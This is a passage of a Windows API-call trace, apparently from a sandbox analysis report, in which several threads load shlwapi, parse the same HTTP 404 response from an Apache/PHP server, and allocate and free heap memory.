os_tid = 0xcd0 [0293.715] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0293.716] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:57 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0293.716] GetProcessHeap () returned 0x5b0000 [0293.716] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0293.716] GetProcessHeap () returned 0x5b0000 [0293.716] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0293.716] GetProcessHeap () returned 0x5b0000 [0293.716] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 103 os_tid = 0xcd4 [0295.291] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0295.292] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:59 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0295.292] GetProcessHeap () returned 0x5b0000 [0295.292] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0295.292] GetProcessHeap () returned 0x5b0000 [0295.292] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0295.292] GetProcessHeap () returned 0x5b0000 [0295.292] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 104 os_tid = 0xcd8 [0297.029] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0297.064] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:22:01 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0297.064] GetProcessHeap () returned 0x5b0000 [0297.064] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0297.064] GetProcessHeap () returned 0x5b0000 [0297.064] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0297.064] GetProcessHeap () returned 0x5b0000 [0297.064] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 105 os_tid = 0xcdc [0298.471] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0298.472] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:22:02 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0298.472] GetProcessHeap () returned 0x5b0000 [0298.472] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0298.472] GetProcessHeap () returned 0x5b0000 [0298.472] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0298.472] GetProcessHeap () returned 0x5b0000 [0298.473] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 106 os_tid = 0xce0 [0299.911] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0299.911] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:22:04 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0299.912] GetProcessHeap () returned 0x5b0000 [0299.912] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0299.912] GetProcessHeap () returned 0x5b0000 [0299.912] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0299.912] GetProcessHeap () returned 0x5b0000 [0299.912] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 107 os_tid = 0xce4 [0301.277] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0301.277] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:22:05 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0301.278] GetProcessHeap () returned 0x5b0000 [0301.278] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0301.278] GetProcessHeap () returned 0x5b0000 [0301.278] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0301.278] GetProcessHeap () returned 0x5b0000 [0301.278] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 108 os_tid = 0xce8 [0302.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0302.674] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:22:07 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0302.674] GetProcessHeap () returned 0x5b0000 [0302.674] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0302.674] GetProcessHeap () returned 0x5b0000 [0302.674] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0302.674] GetProcessHeap () returned 0x5b0000 [0302.675] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 109 os_tid = 0xcec [0304.082] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0304.083] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:22:08 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0304.083] GetProcessHeap () returned 0x5b0000 [0304.083] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0304.083] GetProcessHeap () returned 0x5b0000 [0304.083] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0304.083] GetProcessHeap () returned 0x5b0000 [0304.083] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1